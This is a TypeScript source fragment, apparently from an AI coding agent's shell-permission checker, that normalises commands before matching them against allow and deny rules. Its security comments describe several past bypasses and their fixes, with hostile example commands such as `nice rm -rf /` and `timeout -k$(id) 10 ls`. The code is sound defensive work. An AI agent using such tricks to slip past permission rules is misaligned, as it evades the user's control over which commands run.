+ 'csh',
202
+ 'tcsh',
203
+ 'ksh',
204
+ 'dash',
205
+ 'cmd',
206
+ 'powershell',
207
+ 'pwsh',
208
+ // wrappers that exec their args as a command
209
+ 'env',
210
+ 'xargs',
211
+ // SECURITY: checkSemantics (ast.ts) strips these wrappers to check the
212
+ // wrapped command. Suggesting `Bash(nice:*)` would be ≈ `Bash(*)` — users
213
+ // would add it after a prompt, then `nice rm -rf /` passes semantics while
214
+ // deny/cd+git gates see 'nice' (SAFE_WRAPPER_PATTERNS below didn't strip
215
+ // bare `nice` until this fix). Block these from ever being suggested.
216
+ 'nice',
217
+ 'stdbuf',
218
+ 'nohup',
219
+ 'timeout',
220
+ 'time',
221
+ // privilege escalation — sudo:* from `sudo -u foo ...` would auto-approve
222
+ // any future sudo invocation
223
+ 'sudo',
224
+ 'doas',
225
+ 'pkexec',
226
+ ])
227
+
228
+ /**
229
+ * UI-only fallback: extract the first word alone when getSimpleCommandPrefix
230
+ * declines. In external builds TREE_SITTER_BASH is off, so the async
231
+ * tree-sitter refinement in BashPermissionRequest never fires — without this,
232
+ * pipes and compounds (`python3 file.py 2>&1 | tail -20`) dump into the
233
+ * editable field verbatim.
234
+ *
235
+ * Deliberately not used by suggestionForExactCommand: a backend-suggested
236
+ * `Bash(rm:*)` is too broad to auto-generate, but as an editable starting
237
+ * point it's what users expect (Slack C07VBSHV7EV/p1772670433193449).
238
+ *
239
+ * Reuses the same SAFE_ENV_VARS gate as getSimpleCommandPrefix — a rule like
240
+ * `Bash(python3:*)` can never match `RUN=/path python3 ...` at check time
241
+ * because stripSafeWrappers won't strip RUN.
242
+ */
243
+ export function getFirstWordPrefix(command: string): string | null {
244
+ const tokens = command.trim().split(/\s+/).filter(Boolean)
245
+
246
+ let i = 0
247
+ while (i < tokens.length && ENV_VAR_ASSIGN_RE.test(tokens[i]!)) {
248
+ const varName = tokens[i]!.split('=')[0]!
249
+ const isAntOnlySafe =
250
+ process.env.USER_TYPE === 'ant' && ANT_ONLY_SAFE_ENV_VARS.has(varName)
251
+ if (!SAFE_ENV_VARS.has(varName) && !isAntOnlySafe) {
252
+ return null
253
+ }
254
+ i++
255
+ }
256
+
257
+ const cmd = tokens[i]
258
+ if (!cmd) return null
259
+ // Same shape check as the subcommand regex in getSimpleCommandPrefix:
260
+ // rejects paths (./script.sh, /usr/bin/python), flags, numbers, filenames.
261
+ if (!/^[a-z][a-z0-9]*(-[a-z0-9]+)*$/.test(cmd)) return null
262
+ if (BARE_SHELL_PREFIXES.has(cmd)) return null
263
+ return cmd
264
+ }
265
+
266
+ function suggestionForExactCommand(command: string): PermissionUpdate[] {
267
+ // Heredoc commands contain multi-line content that changes each invocation,
268
+ // making exact-match rules useless (they'll never match again). Extract a
269
+ // stable prefix before the heredoc operator and suggest a prefix rule instead.
270
+ const heredocPrefix = extractPrefixBeforeHeredoc(command)
271
+ if (heredocPrefix) {
272
+ return sharedSuggestionForPrefix(BashTool.name, heredocPrefix)
273
+ }
274
+
275
+ // Multiline commands without heredoc also make poor exact-match rules.
276
+ // Saving the full multiline text can produce patterns containing `:*` in
277
+ // the middle, which fails permission validation and corrupts the settings
278
+ // file. Use the first line as a prefix rule instead.
279
+ if (command.includes('\n')) {
280
+ const firstLine = command.split('\n')[0]!.trim()
281
+ if (firstLine) {
282
+ return sharedSuggestionForPrefix(BashTool.name, firstLine)
283
+ }
284
+ }
285
+
286
+ // Single-line commands: extract a 2-word prefix for reusable rules.
287
+ // Without this, exact-match rules are saved that never match future
288
+ // invocations with different arguments.
289
+ const prefix = getSimpleCommandPrefix(command)
290
+ if (prefix) {
291
+ return sharedSuggestionForPrefix(BashTool.name, prefix)
292
+ }
293
+
294
+ return sharedSuggestionForExactCommand(BashTool.name, command)
295
+ }
296
+
297
+ /**
298
+ * If the command contains a heredoc (<<), extract the command prefix before it.
299
+ * Returns the first word(s) before the heredoc operator as a stable prefix,
300
+ * or null if the command doesn't contain a heredoc.
301
+ *
302
+ * Examples:
303
+ * 'git commit -m "$(cat <<\'EOF\'\n...\nEOF\n)"' → 'git commit'
304
+ * 'cat <<EOF\nhello\nEOF' → 'cat'
305
+ * 'echo hello' → null (no heredoc)
306
+ */
307
+ function extractPrefixBeforeHeredoc(command: string): string | null {
308
+ if (!command.includes('<<')) return null
309
+
310
+ const idx = command.indexOf('<<')
311
+ if (idx <= 0) return null
312
+
313
+ const before = command.substring(0, idx).trim()
314
+ if (!before) return null
315
+
316
+ const prefix = getSimpleCommandPrefix(before)
317
+ if (prefix) return prefix
318
+
319
+ // Fallback: skip safe env var assignments and take up to 2 tokens.
320
+ // This preserves flag tokens (e.g., "python3 -c" stays "python3 -c",
321
+ // not just "python3") and skips safe env var prefixes like "NODE_ENV=test".
322
+ // If a non-safe env var is encountered, return null to avoid generating
323
+ // prefix rules that can never match (same rationale as getSimpleCommandPrefix).
324
+ const tokens = before.split(/\s+/).filter(Boolean)
325
+ let i = 0
326
+ while (i < tokens.length && ENV_VAR_ASSIGN_RE.test(tokens[i]!)) {
327
+ const varName = tokens[i]!.split('=')[0]!
328
+ const isAntOnlySafe =
329
+ process.env.USER_TYPE === 'ant' && ANT_ONLY_SAFE_ENV_VARS.has(varName)
330
+ if (!SAFE_ENV_VARS.has(varName) && !isAntOnlySafe) {
331
+ return null
332
+ }
333
+ i++
334
+ }
335
+ if (i >= tokens.length) return null
336
+ return tokens.slice(i, i + 2).join(' ') || null
337
+ }
338
+
339
+ function suggestionForPrefix(prefix: string): PermissionUpdate[] {
340
+ return sharedSuggestionForPrefix(BashTool.name, prefix)
341
+ }
342
+
343
+ /**
344
+ * Extract prefix from legacy :* syntax (e.g., "npm:*" -> "npm")
345
+ * Delegates to shared implementation.
346
+ */
347
+ export const permissionRuleExtractPrefix = sharedPermissionRuleExtractPrefix
348
+
349
+ /**
350
+ * Match a command against a wildcard pattern (case-sensitive for Bash).
351
+ * Delegates to shared implementation.
352
+ */
353
+ export function matchWildcardPattern(
354
+ pattern: string,
355
+ command: string,
356
+ ): boolean {
357
+ return sharedMatchWildcardPattern(pattern, command)
358
+ }
359
+
360
+ /**
361
+ * Parse a permission rule into a structured rule object.
362
+ * Delegates to shared implementation.
363
+ */
364
+ export const bashPermissionRule: (
365
+ permissionRule: string,
366
+ ) => ShellPermissionRule = parsePermissionRule
367
+
368
+ /**
369
+ * Whitelist of environment variables that are safe to strip from commands.
370
+ * These variables CANNOT execute code or load libraries.
371
+ *
372
+ * SECURITY: These must NEVER be added to the whitelist:
373
+ * - PATH, LD_PRELOAD, LD_LIBRARY_PATH, DYLD_* (execution/library loading)
374
+ * - PYTHONPATH, NODE_PATH, CLASSPATH, RUBYLIB (module loading)
375
+ * - GOFLAGS, RUSTFLAGS, NODE_OPTIONS (can contain code execution flags)
376
+ * - HOME, TMPDIR, SHELL, BASH_ENV (affect system behavior)
377
+ */
378
+ const SAFE_ENV_VARS = new Set([
379
+ // Go - build/runtime settings only
380
+ 'GOEXPERIMENT', // experimental features
381
+ 'GOOS', // target OS
382
+ 'GOARCH', // target architecture
383
+ 'CGO_ENABLED', // enable/disable CGO
384
+ 'GO111MODULE', // module mode
385
+
386
+ // Rust - logging/debugging only
387
+ 'RUST_BACKTRACE', // backtrace verbosity
388
+ 'RUST_LOG', // logging filter
389
+
390
+ // Node - environment name only (not NODE_OPTIONS!)
391
+ 'NODE_ENV',
392
+
393
+ // Python - behavior flags only (not PYTHONPATH!)
394
+ 'PYTHONUNBUFFERED', // disable buffering
395
+ 'PYTHONDONTWRITEBYTECODE', // no .pyc files
396
+
397
+ // Pytest - test configuration
398
+ 'PYTEST_DISABLE_PLUGIN_AUTOLOAD', // disable plugin loading
399
+ 'PYTEST_DEBUG', // debug output
400
+
401
+ // API keys and authentication
402
+ 'ANTHROPIC_API_KEY', // API authentication
403
+
404
+ // Locale and character encoding
405
+ 'LANG', // default locale
406
+ 'LANGUAGE', // language preference list
407
+ 'LC_ALL', // override all locale settings
408
+ 'LC_CTYPE', // character classification
409
+ 'LC_TIME', // time format
410
+ 'CHARSET', // character set preference
411
+
412
+ // Terminal and display
413
+ 'TERM', // terminal type
414
+ 'COLORTERM', // color terminal indicator
415
+ 'NO_COLOR', // disable color output (universal standard)
416
+ 'FORCE_COLOR', // force color output
417
+ 'TZ', // timezone
418
+
419
+ // Color configuration for various tools
420
+ 'LS_COLORS', // colors for ls (GNU)
421
+ 'LSCOLORS', // colors for ls (BSD/macOS)
422
+ 'GREP_COLOR', // grep match color (deprecated)
423
+ 'GREP_COLORS', // grep color scheme
424
+ 'GCC_COLORS', // GCC diagnostic colors
425
+
426
+ // Display formatting
427
+ 'TIME_STYLE', // time display format for ls
428
+ 'BLOCK_SIZE', // block size for du/df
429
+ 'BLOCKSIZE', // alternative block size
430
+ ])
431
+
432
+ /**
433
+ * ANT-ONLY environment variables that are safe to strip from commands.
434
+ * These are only enabled when USER_TYPE === 'ant'.
435
+ *
436
+ * SECURITY: These env vars are stripped before permission-rule matching, which
437
+ * means `DOCKER_HOST=tcp://evil.com docker ps` matches a `Bash(docker ps:*)`
438
+ * rule after stripping. This is INTENTIONALLY ANT-ONLY (gated at line ~380)
439
+ * and MUST NEVER ship to external users. DOCKER_HOST redirects the Docker
440
+ * daemon endpoint — stripping it defeats prefix-based permission restrictions
441
+ * by hiding the network endpoint from the permission check. KUBECONFIG
442
+ * similarly controls which cluster kubectl talks to. These are convenience
443
+ * strippings for internal power users who accept the risk.
444
+ *
445
+ * Based on analysis of 30 days of tengu_internal_bash_tool_use_permission_request events.
446
+ */
447
+ const ANT_ONLY_SAFE_ENV_VARS = new Set([
448
+ // Kubernetes and container config (config file pointers, not execution)
449
+ 'KUBECONFIG', // kubectl config file path — controls which cluster kubectl uses
450
+ 'DOCKER_HOST', // Docker daemon socket/endpoint — controls which daemon docker talks to
451
+
452
+ // Cloud provider project/profile selection (just names/identifiers)
453
+ 'AWS_PROFILE', // AWS profile name selection
454
+ 'CLOUDSDK_CORE_PROJECT', // GCP project ID
455
+ 'CLUSTER', // generic cluster name
456
+
457
+ // Anthropic internal cluster selection (just names/identifiers)
458
+ 'COO_CLUSTER', // coo cluster name
459
+ 'COO_CLUSTER_NAME', // coo cluster name (alternate)
460
+ 'COO_NAMESPACE', // coo namespace
461
+ 'COO_LAUNCH_YAML_DRY_RUN', // dry run mode
462
+
463
+ // Feature flags (boolean/string flags only)
464
+ 'SKIP_NODE_VERSION_CHECK', // skip version check
465
+ 'EXPECTTEST_ACCEPT', // accept test expectations
466
+ 'CI', // CI environment indicator
467
+ 'GIT_LFS_SKIP_SMUDGE', // skip LFS downloads
468
+
469
+ // GPU/Device selection (just device IDs)
470
+ 'CUDA_VISIBLE_DEVICES', // GPU device selection
471
+ 'JAX_PLATFORMS', // JAX platform selection
472
+
473
+ // Display/terminal settings
474
+ 'COLUMNS', // terminal width
475
+ 'TMUX', // TMUX socket info
476
+
477
+ // Test/debug configuration
478
+ 'POSTGRESQL_VERSION', // postgres version string
479
+ 'FIRESTORE_EMULATOR_HOST', // emulator host:port
480
+ 'HARNESS_QUIET', // quiet mode flag
481
+ 'TEST_CROSSCHECK_LISTS_MATCH_UPDATE', // test update flag
482
+ 'DBT_PER_DEVELOPER_ENVIRONMENTS', // DBT config
483
+ 'STATSIG_FORD_DB_CHECKS', // statsig DB check flag
484
+
485
+ // Build configuration
486
+ 'ANT_ENVIRONMENT', // Anthropic environment name
487
+ 'ANT_SERVICE', // Anthropic service name
488
+ 'MONOREPO_ROOT_DIR', // monorepo root path
489
+
490
+ // Version selectors
491
+ 'PYENV_VERSION', // Python version selection
492
+
493
+ // Credentials (approved subset - these don't change exfil risk)
494
+ 'PGPASSWORD', // Postgres password
495
+ 'GH_TOKEN', // GitHub token
496
+ 'GROWTHBOOK_API_KEY', // self-hosted growthbook
497
+ ])
498
+
499
+ /**
500
+ * Strips full-line comments from a command.
501
+ * This handles cases where Claude adds comments in bash commands, e.g.:
502
+ * "# Check the logs directory\nls /home/user/logs"
503
+ * Should be stripped to: "ls /home/user/logs"
504
+ *
505
+ * Only strips full-line comments (lines where the entire line is a comment),
506
+ * not inline comments that appear after a command on the same line.
507
+ */
508
+ function stripCommentLines(command: string): string {
509
+ const lines = command.split('\n')
510
+ const nonCommentLines = lines.filter(line => {
511
+ const trimmed = line.trim()
512
+ // Keep lines that are not empty and don't start with #
513
+ return trimmed !== '' && !trimmed.startsWith('#')
514
+ })
515
+
516
+ // If all lines were comments/empty, return original
517
+ if (nonCommentLines.length === 0) {
518
+ return command
519
+ }
520
+
521
+ return nonCommentLines.join('\n')
522
+ }
523
+
524
+ export function stripSafeWrappers(command: string): string {
525
+ // SECURITY: Use [ \t]+ not \s+ — \s matches \n/\r which are command
526
+ // separators in bash. Matching across a newline would strip the wrapper from
527
+ // one line and leave a different command on the next line for bash to execute.
528
+ //
529
+ // SECURITY: `(?:--[ \t]+)?` consumes the wrapper's own `--` so
530
+ // `nohup -- rm -- -/../foo` strips to `rm -- -/../foo` (not `-- rm ...`
531
+ // which would skip path validation with `--` as an unknown baseCmd).
532
+ const SAFE_WRAPPER_PATTERNS = [
533
+ // timeout: enumerate GNU long flags — no-value (--foreground,
534
+ // --preserve-status, --verbose), value-taking in both =fused and
535
+ // space-separated forms (--kill-after=5, --kill-after 5, --signal=TERM,
536
+ // --signal TERM). Short: -v (no-arg), -k/-s with separate or fused value.
537
+ // SECURITY: flag VALUES use allowlist [A-Za-z0-9_.+-] (signals are
538
+ // TERM/KILL/9, durations are 5/5s/10.5). Previously [^ \t]+ matched
539
+ // $ ( ) ` | ; & — `timeout -k$(id) 10 ls` stripped to `ls`, matched
540
+ // Bash(ls:*), while bash expanded $(id) during word splitting BEFORE
541
+ // timeout ran. Contrast ENV_VAR_PATTERN below which already allowlists.
542
+ /^timeout[ \t]+(?:(?:--(?:foreground|preserve-status|verbose)|--(?:kill-after|signal)=[A-Za-z0-9_.+-]+|--(?:kill-after|signal)[ \t]+[A-Za-z0-9_.+-]+|-v|-[ks][ \t]+[A-Za-z0-9_.+-]+|-[ks][A-Za-z0-9_.+-]+)[ \t]+)*(?:--[ \t]+)?\d+(?:\.\d+)?[smhd]?[ \t]+/,
543
+ /^time[ \t]+(?:--[ \t]+)?/,
544
+ // SECURITY: keep in sync with checkSemantics wrapper-strip (ast.ts
545
+ // ~:1990-2080) AND stripWrappersFromArgv (pathValidation.ts ~:1260).
546
+ // Previously this pattern REQUIRED `-n N`; checkSemantics already handled
547
+ // bare `nice` and legacy `-N`. Asymmetry meant checkSemantics exposed the
548
+ // wrapped command to semantic checks but deny-rule matching and the cd+git
549
+ // gate saw the wrapper name. `nice rm -rf /` with Bash(rm:*) deny became
550
+ // ask instead of deny; `cd evil && nice git status` skipped the bare-repo
551
+ // RCE gate. PR #21503 fixed stripWrappersFromArgv; this was missed.
552
+ // Now matches: `nice cmd`, `nice -n N cmd`, `nice -N cmd` (all forms
553
+ // checkSemantics strips).
554
+ /^nice(?:[ \t]+-n[ \t]+-?\d+|[ \t]+-\d+)?[ \t]+(?:--[ \t]+)?/,
555
+ // stdbuf: fused short flags only (-o0, -eL). checkSemantics handles more
556
+ // (space-separated, long --output=MODE), but we fail-closed on those
557
+ // above so not over-stripping here is safe. Main need: `stdbuf -o0 cmd`.
558
+ /^stdbuf(?:[ \t]+-[ioe][LN0-9]+)+[ \t]+(?:--[ \t]+)?/,
559
+ /^nohup[ \t]+(?:--[ \t]+)?/,
560
+ ] as const
561
+
562
+ // Pattern for environment variables:
563
+ // ^([A-Za-z_][A-Za-z0-9_]*) - Variable name (standard identifier)
564
+ // = - Equals sign
565
+ // ([A-Za-z0-9_./:-]+) - Value: alphanumeric + safe punctuation only
566
+ // [ \t]+ - Required HORIZONTAL whitespace after value
567
+ //
568
+ // SECURITY: Only matches unquoted values with safe characters (no $(), `, $var, ;|&).
569
+ //
570
+ // SECURITY: Trailing whitespace MUST be [ \t]+ (horizontal only), NOT \s+.
571
+ // \s matches \n/\r. If reconstructCommand emits an unquoted newline between
572
+ // `TZ=UTC` and `echo`, \s+ would match across it and strip `TZ=UTC<NL>`,
573
+ // leaving `echo curl evil.com` to match Bash(echo:*). But bash treats the
574
+ // newline as a command separator. Defense-in-depth with needsQuoting fix.
575
+ const ENV_VAR_PATTERN = /^([A-Za-z_][A-Za-z0-9_]*)=([A-Za-z0-9_./:-]+)[ \t]+/
576
+
577
+ let stripped = command
578
+ let previousStripped = ''
579
+
580
+ // Phase 1: Strip leading env vars and comments only.
581
+ // In bash, env var assignments before a command (VAR=val cmd) are genuine
582
+ // shell-level assignments. These are safe to strip for permission matching.
583
+ while (stripped !== previousStripped) {
584
+ previousStripped = stripped
585
+ stripped = stripCommentLines(stripped)
586
+
587
+ const envVarMatch = stripped.match(ENV_VAR_PATTERN)
588
+ if (envVarMatch) {
589
+ const varName = envVarMatch[1]!
590
+ const isAntOnlySafe =
591
+ process.env.USER_TYPE === 'ant' && ANT_ONLY_SAFE_ENV_VARS.has(varName)
592
+ if (SAFE_ENV_VARS.has(varName) || isAntOnlySafe) {
593
+ stripped = stripped.replace(ENV_VAR_PATTERN, '')
594
+ }
595
+ }
596
+ }
597
+
598
+ // Phase 2: Strip wrapper commands and comments only. Do NOT strip env vars.
599
+ // Wrapper commands (timeout, time, nice, nohup) use execvp to run their
600
+ // arguments, so VAR=val after a wrapper is treated as the COMMAND to execute,
601
+ // not as an env var assignment. Stripping env vars here would create a
602
+ // mismatch between what the parser sees and what actually executes.
603
+ // (HackerOne #3543050)
604
+ previousStripped = ''
605
+ while (stripped !== previousStripped) {
606
+ previousStripped = stripped
607
+ stripped = stripCommentLines(stripped)
608
+
609
+ for (const pattern of SAFE_WRAPPER_PATTERNS) {
610
+ stripped = stripped.replace(pattern, '')
611
+ }
612
+ }
613
+
614
+ return stripped.trim()
615
+ }
616
+
617
+ // SECURITY: allowlist for timeout flag VALUES (signals are TERM/KILL/9,
618
+ // durations are 5/5s/10.5). Rejects $ ( ) ` | ; & and newlines that
619
+ // previously matched via [^ \t]+ — `timeout -k$(id) 10 ls` must NOT strip.
620
+ const TIMEOUT_FLAG_VALUE_RE = /^[A-Za-z0-9_.+-]+$/
621
+
622
+ /**
623
+ * Parse timeout's GNU flags (long + short, fused + space-separated) and
624
+ * return the argv index of the DURATION token, or -1 if flags are unparseable.
625
+ * Enumerates: --foreground/--preserve-status/--verbose (no value),
626
+ * --kill-after/--signal (value, both =fused and space-separated), -v (no
627
+ * value), -k/-s (value, both fused and space-separated).
628
+ *
629
+ * Extracted from stripWrappersFromArgv to keep bashToolHasPermission under
630
+ * Bun's feature() DCE complexity threshold — inlining this breaks
631
+ * feature('BASH_CLASSIFIER') evaluation in classifier tests.
632
+ */
633
+ function skipTimeoutFlags(a: readonly string[]): number {
634
+ let i = 1
635
+ while (i < a.length) {
636
+ const arg = a[i]!
637
+ const next = a[i + 1]
638
+ if (
639
+ arg === '--foreground' ||
640
+ arg === '--preserve-status' ||
641
+ arg === '--verbose'
642
+ )
643
+ i++
644
+ else if (/^--(?:kill-after|signal)=[A-Za-z0-9_.+-]+$/.test(arg)) i++
645
+ else if (
646
+ (arg === '--kill-after' || arg === '--signal') &&
647
+ next &&
648
+ TIMEOUT_FLAG_VALUE_RE.test(next)
649
+ )
650
+ i += 2
651
+ else if (arg === '--') {
652
+ i++
653
+ break
654
+ } // end-of-options marker
655
+ else if (arg.startsWith('--')) return -1
656
+ else if (arg === '-v') i++
657
+ else if (
658
+ (arg === '-k' || arg === '-s') &&
659
+ next &&
660
+ TIMEOUT_FLAG_VALUE_RE.test(next)
661
+ )
662
+ i += 2
663
+ else if (/^-[ks][A-Za-z0-9_.+-]+$/.test(arg)) i++
664
+ else if (arg.startsWith('-')) return -1
665
+ else break
666
+ }
667
+ return i
668
+ }
669
+
670
+ /**
671
+ * Argv-level counterpart to stripSafeWrappers. Strips the same wrapper
672
+ * commands (timeout, time, nice, nohup) from AST-derived argv. Env vars
673
+ * are already separated into SimpleCommand.envVars so no env-var stripping.
674
+ *
675
+ * KEEP IN SYNC with SAFE_WRAPPER_PATTERNS above — if you add a wrapper
676
+ * there, add it here too.
677
+ */
678
+ export function stripWrappersFromArgv(argv: string[]): string[] {
679
+ // SECURITY: Consume optional `--` after wrapper options, matching what the
680
+ // wrapper does. Otherwise `['nohup','--','rm','--','-/../foo']` yields `--`
681
+ // as baseCmd and skips path validation. See SAFE_WRAPPER_PATTERNS comment.
682
+ let a = argv
683
+ for (;;) {
684
+ if (a[0] === 'time' || a[0] === 'nohup') {
685
+ a = a.slice(a[1] === '--' ? 2 : 1)
686
+ } else if (a[0] === 'timeout') {
687
+ const i = skipTimeoutFlags(a)
688
+ if (i < 0 || !a[i] || !/^\d+(?:\.\d+)?[smhd]?$/.test(a[i]!)) return a
689
+ a = a.slice(i + 1)
690
+ } else if (
691
+ a[0] === 'nice' &&
692
+ a[1] === '-n' &&
693
+ a[2] &&
694
+ /^-?\d+$/.test(a[2])
695
+ ) {
696
+ a = a.slice(a[3] === '--' ? 4 : 3)
697
+ } else {
698
+ return a
699
+ }
700
+ }
701
+ }
702
+
703
+ /**
704
+ * Env vars that make a *different binary* run (injection or resolution hijack).
705
+ * Heuristic only — export-&& form bypasses this, and excludedCommands isn't a
706
+ * security boundary anyway.
707
+ */
708
+ export const BINARY_HIJACK_VARS = /^(LD_|DYLD_|PATH$)/
709
+
710
+ /**
711
+ * Strip ALL leading env var prefixes from a command, regardless of whether the
712
+ * var name is in the safe-list.
713
+ *
714
+ * Used for deny/ask rule matching: when a user denies `claude` or `rm`, the
715
+ * command should stay blocked even if prefixed with arbitrary env vars like
716
+ * `FOO=bar claude`. The safe-list restriction in stripSafeWrappers is correct
717
+ * for allow rules (prevents `DOCKER_HOST=evil docker ps` from auto-matching
718
+ * `Bash(docker ps:*)`), but deny rules must be harder to circumvent.
719
+ *
720
+ * Also used for sandbox.excludedCommands matching (not a security boundary —
721
+ * permission prompts are), with BINARY_HIJACK_VARS as a blocklist.
722
+ *
723
+ * SECURITY: Uses a broader value pattern than stripSafeWrappers. The value
724
+ * pattern excludes only actual shell injection characters ($, backtick, ;, |,
725
+ * &, parens, redirects, quotes, backslash) and whitespace. Characters like
726
+ * =, +, @, ~, , are harmless in unquoted env var assignment position and must
727
+ * be matched to prevent trivial bypass via e.g. `FOO=a=b denied_command`.
728
+ *
729
+ * @param blocklist - optional regex tested against each var name; matching vars
730
+ * are NOT stripped (and stripping stops there). Omit for deny rules; pass
731
+ * BINARY_HIJACK_VARS for excludedCommands.
732
+ */
733
+ export function stripAllLeadingEnvVars(
734
+ command: string,
735
+ blocklist?: RegExp,
736
+ ): string {
737
+ // Broader value pattern for deny-rule stripping. Handles:
738
+ //
739
+ // - Standard assignment (FOO=bar), append (FOO+=bar), array (FOO[0]=bar)
740
+ // - Single-quoted values: '[^'\n\r]*' — bash suppresses all expansion
741
+ // - Double-quoted values with backslash escapes: "(?:\\.|[^"$`\\\n\r])*"
742
+ // In bash double quotes, only \$, \`, \", \\, and \newline are special.
743
+ // Other \x sequences are harmless, so we allow \. inside double quotes.
744
+ // We still exclude raw $ and ` (without backslash) to block expansion.
745
+ // - Unquoted values: excludes shell metacharacters, allows backslash escapes
746
+ // - Concatenated segments: FOO='x'y"z" — bash concatenates adjacent segments
747
+ //
748
+ // SECURITY: Trailing whitespace MUST be [ \t]+ (horizontal only), NOT \s+.
749
+ //
750
+ // The outer * matches one atomic unit per iteration: a complete quoted
751
+ // string, a backslash-escape pair, or a single unquoted safe character.
752
+ // The inner double-quote alternation (?:...|...)* is bounded by the
753
+ // closing ", so it cannot interact with the outer * for backtracking.
754
+ //
755
+ // Note: $ is excluded from unquoted/double-quoted value classes to block
756
+ // dangerous forms like $(cmd), ${var}, and $((expr)). This means
757
+ // FOO=$VAR is not stripped — adding $VAR matching creates ReDoS risk
758
+ // (CodeQL #671) and $VAR bypasses are low-priority.
759
+ const ENV_VAR_PATTERN =
760
+ /^([A-Za-z_][A-Za-z0-9_]*(?:\[[^\]]*\])?)\+?=(?:'[^'\n\r]*'|"(?:\\.|[^"$`\\\n\r])*"|\\.|[^ \t\n\r$`;|&()<>\\\\'"])*[ \t]+/
761
+
762
+ let stripped = command
763
+ let previousStripped = ''
764
+
765
+ while (stripped !== previousStripped) {
766
+ previousStripped = stripped
767
+ stripped = stripCommentLines(stripped)
768
+
769
+ const m = stripped.match(ENV_VAR_PATTERN)
770
+ if (!m) continue
771
+ if (blocklist?.test(m[1]!)) break
772
+ stripped = stripped.slice(m[0].length)
773
+ }
774
+
775
+ return stripped.trim()
776
+ }
777
+
778
+ function filterRulesByContentsMatchingInput(
779
+ input: z.infer<typeof BashTool.inputSchema>,
780
+ rules: Map<string, PermissionRule>,
781
+ matchMode: 'exact' | 'prefix',
782
+ {
783
+ stripAllEnvVars = false,
784
+ skipCompoundCheck = false,
785
+ }: { stripAllEnvVars?: boolean; skipCompoundCheck?: boolean } = {},
786
+ ): PermissionRule[] {
787
+ const command = input.command.trim()
788
+
789
+ // Strip output redirections for permission matching
790
+ // This allows rules like Bash(python:*) to match "python script.py > output.txt"
791
+ // Security validation of redirection targets happens separately in checkPathConstraints
792
+ const commandWithoutRedirections =
793
+ extractOutputRedirections(command).commandWithoutRedirections
794
+
795
+ // For exact matching, try both the original command (to preserve quotes)
796
+ // and the command without redirections (to allow rules without redirections to match)
797
+ // For prefix matching, only use the command without redirections
798
+ const commandsForMatching =
799
+ matchMode === 'exact'
800
+ ? [command, commandWithoutRedirections]
801
+ : [commandWithoutRedirections]
802
+
803
+ // Strip safe wrapper commands (timeout, time, nice, nohup) and env vars for matching
804
+ // This allows rules like Bash(npm install:*) to match "timeout 10 npm install foo"
805
+ // or "GOOS=linux go build"
806
+ const commandsToTry = commandsForMatching.flatMap(cmd => {
807
+ const strippedCommand = stripSafeWrappers(cmd)
808
+ return strippedCommand !== cmd ? [cmd, strippedCommand] : [cmd]
809
+ })
810
+
811
+ // SECURITY: For deny/ask rules, also try matching after stripping ALL leading
812
+ // env var prefixes. This prevents bypass via `FOO=bar denied_command` where
813
+ // FOO is not in the safe-list. The safe-list restriction in stripSafeWrappers
814
+ // is intentional for allow rules (see HackerOne #3543050), but deny rules
815
+ // must be harder to circumvent — a denied command should stay denied
816
+ // regardless of env var prefixes.
817
+ //
818
+ // We iteratively apply both stripping operations to all candidates until no
819
+ // new candidates are produced (fixed-point). This handles interleaved patterns
820
+ // like `nohup FOO=bar timeout 5 claude` where:
821
+ // 1. stripSafeWrappers strips `nohup` → `FOO=bar timeout 5 claude`
822
+ // 2. stripAllLeadingEnvVars strips `FOO=bar` → `timeout 5 claude`
823
+ // 3. stripSafeWrappers strips `timeout 5` → `claude` (deny match)
824
+ //
825
+ // Without iteration, single-pass compositions miss multi-layer interleaving.
826
+ if (stripAllEnvVars) {
827
+ const seen = new Set(commandsToTry)
828
+ let startIdx = 0
829
+
830
+ // Iterate until no new candidates are produced (fixed-point)
831
+ while (startIdx < commandsToTry.length) {
832
+ const endIdx = commandsToTry.length
833
+ for (let i = startIdx; i < endIdx; i++) {
834
+ const cmd = commandsToTry[i]
835
+ if (!cmd) {
836
+ continue
837
+ }
838
+ // Try stripping env vars
839
+ const envStripped = stripAllLeadingEnvVars(cmd)
840
+ if (!seen.has(envStripped)) {
841
+ commandsToTry.push(envStripped)
842
+ seen.add(envStripped)
843
+ }
844
+ // Try stripping safe wrappers
845
+ const wrapperStripped = stripSafeWrappers(cmd)
846
+ if (!seen.has(wrapperStripped)) {
847
+ commandsToTry.push(wrapperStripped)
848
+ seen.add(wrapperStripped)
849
+ }
850
+ }
851
+ startIdx = endIdx
852
+ }
853
+ }
854
+
855
+ // Precompute compound-command status for each candidate to avoid re-parsing
856
+ // inside the rule filter loop (which would scale splitCommand calls with
857
+ // rules.length × commandsToTry.length). The compound check only applies to
858
+ // prefix/wildcard matching in 'prefix' mode, and only for allow rules.
859
+ // SECURITY: deny/ask rules must match compound commands so they can't be
860
+ // bypassed by wrapping a denied command in a compound expression.
861
+ const isCompoundCommand = new Map<string, boolean>()
862
+ if (matchMode === 'prefix' && !skipCompoundCheck) {
863
+ for (const cmd of commandsToTry) {
864
+ if (!isCompoundCommand.has(cmd)) {
865
+ isCompoundCommand.set(cmd, splitCommand(cmd).length > 1)
866
+ }
867
+ }
868
+ }
869
+
870
+ return Array.from(rules.entries())
871
+ .filter(([ruleContent]) => {
872
+ const bashRule = bashPermissionRule(ruleContent)
873
+
874
+ return commandsToTry.some(cmdToMatch => {
875
+ switch (bashRule.type) {
876
+ case 'exact':
877
+ return bashRule.command === cmdToMatch
878
+ case 'prefix':
879
+ switch (matchMode) {
880
+ // In 'exact' mode, only return true if the command exactly matches the prefix rule
881
+ case 'exact':
882
+ return bashRule.prefix === cmdToMatch
883
+ case 'prefix': {
884
+ // SECURITY: Don't allow prefix rules to match compound commands.
885
+ // e.g., Bash(cd:*) must NOT match "cd /path && python3 evil.py".
886
+ // In the normal flow commands are split before reaching here, but
887
+ // shell escaping can defeat the first splitCommand pass — e.g.,
888
+ // cd src\&\& python3 hello.py → splitCommand → ["cd src&& python3 hello.py"]
889
+ // which then looks like a single command that starts with "cd ".
890
+ // Re-splitting the candidate here catches those cases.
891
+ if (isCompoundCommand.get(cmdToMatch)) {
892
+ return false
893
+ }
894
+ // Ensure word boundary: prefix must be followed by space or end of string
895
+ // This prevents "ls:*" from matching "lsof" or "lsattr"
896
+ if (cmdToMatch === bashRule.prefix) {
897
+ return true
898
+ }
899
+ if (cmdToMatch.startsWith(bashRule.prefix + ' ')) {
900
+ return true
901
+ }
902
+ // Also match "xargs <prefix>" for bare xargs with no flags.
903
+ // This allows Bash(grep:*) to match "xargs grep pattern",
904
